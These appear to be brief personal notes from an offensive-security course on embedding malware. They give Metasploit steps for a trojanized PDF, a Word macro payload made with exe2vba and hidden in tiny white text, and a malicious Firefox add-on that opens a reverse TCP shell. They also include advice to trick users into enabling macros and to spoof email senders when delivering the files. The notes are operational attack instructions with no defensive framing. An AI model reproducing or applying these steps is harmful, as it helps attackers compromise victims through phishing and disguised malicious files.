Embedding Malware

Embedding Malware in PDFs

  1. Launch Metasploit
  2. search adobe_pdf
  3. set options
    1. set Payload
    2. set INFILENAME /root/Deskstop/syllabus.pdf
    3. set FILENAME bad_syllabus.pdf
    4. set LHOST <IP Address>
    5. exploit
  4. From here you can send the file as email, flash drives, etc

Embedding Malware into MACRO Word document

  1. Creating a malicious executable
  2. Converting to a visualbasic script – macro code
  3. Create a MS word document
  4. starting listener
  5. opening the malicious document
  6. collection session

Tool for embedding into word document exe2vba

This tool in kali can be located in /usr/share/metasploit-framework/tools/exploit

run the tool .sudo msf-exe2vba <exe (your malicious file)> <VBA (create new one>

Now go to the Windows machine and transfer the new vba file

Create new Word document.

Create a macro

  1. View tab
  2. Macros
  3. View macros
  4. give name
  5. create

Open VBA file and copy the macro code part and past it into the macro code page in word

Save changes.

We stil lhave to ebed the payload into the document

Copy the payload data part in from the VBA file

paste it into the word document.

Shrinking the font size makes it seem like a regular document. You can also make the text the color white

Due to macros being disabled by default, you will need to convince the end user to enable macros


Sending malware as browser addon

Another way to compromise is to send the malware as a browser addon

Metasploit can be used to create this

  1. Launch Metasploit framework
  2. search firefox_xpi
  3. use
  4. show payloads
  5. use shell payload with reverse tcp connection
  6. set SRVHOST — this will be the server will an app server will be started. This will be our machine
  7. set SRVPORT– you can use 8080 for this
  8. set URIPATH –this is the path of the payload
  9. set LHOST
  10. exploit

You can now copy the URL and paste it in the address bar to verify the server is running

For sending a link through email, you can use YOPMail.com. This will allow you to spoof a sender